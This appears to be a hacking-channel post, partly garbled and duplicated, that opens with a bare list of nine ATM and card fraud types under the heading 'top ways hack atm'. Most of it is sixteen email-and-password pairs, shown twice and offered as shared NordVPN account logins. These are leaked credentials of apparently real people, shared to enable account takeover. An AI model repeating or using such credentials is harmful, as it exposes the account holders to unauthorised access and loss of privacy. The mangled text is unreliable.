π¦top ways hack atm #secure against them
the "electronic Sherlock Holmes" share 9 main types of cybercrime.
1. Operations with fake cards.
2. Operations with stolen / lost cards.
3. Multiple payment for services and goods.
4. Fraud with mail / telephone orders.
5. Repeated withdrawal from the account.
6. Fraud using fake slip.
7. Fraudulent use of ATMs in cash withdrawals.
8. Connecting an electronic recording device to a POS terminal / ATM (Skimming).
9. Other types of fraud.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦top ways hack atm #secure against them
the "electronic Sherlock Holmes" share 9 main types of cybercrime.
1. Operations with fake cards.
2. Operations with stolen / lost cards.
3. Multiple payment for services and goods.
4. Fraud with mail / telephone orders.
5. Repeated withdrawal from the account.
6. Fraud using fake slip.
7. Fraudulent use of ATMs in cash withdrawals.
8. Connecting an electronic recording device to a POS terminal / ATM (Skimming).
9. Other types of fraud.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME VERIFIED PUBLIC NORDVPN PRE :
bportjoey@gmail.com:Frankie8904
armiechedon@gmail.com:derpderp5
thenykk@gmail.com:Slytherin5
mmuniz93@gmail.com:Manchester24
hugodewerra@gmail.com:Patchouli7
epbruen@gmail.com:Bugman01
jtarman20@gmail.com:Hooyah18
jackieguo0328@gmail.com:ghj33972
tipwow@yahoo.com:State123
sugiyamd@gmail.com:Andrew1997
mathis.knaepen@hotmail.com:Coco_101
stofferclc@gmail.com:Stoffer2005
jhollis_8@hotmail.com:nicholas1
otheswift@gmail.com:Peluchin1124
pooraggies247@gmail.com:Mklop1023
pierrick.ramin@gmail.com:fsx974pie
(not cracked by Us)
bportjoey@gmail.com:Frankie8904
armiechedon@gmail.com:derpderp5
thenykk@gmail.com:Slytherin5
mmuniz93@gmail.com:Manchester24
hugodewerra@gmail.com:Patchouli7
epbruen@gmail.com:Bugman01
jtarman20@gmail.com:Hooyah18
jackieguo0328@gmail.com:ghj33972
tipwow@yahoo.com:State123
sugiyamd@gmail.com:Andrew1997
mathis.knaepen@hotmail.com:Coco_101
stofferclc@gmail.com:Stoffer2005
jhollis_8@hotmail.com:nicholas1
otheswift@gmail.com:Peluchin1124
pooraggies247@gmail.com:Mklop1023
pierrick.ramin@gmail.com:fsx974pie
(not cracked by Us)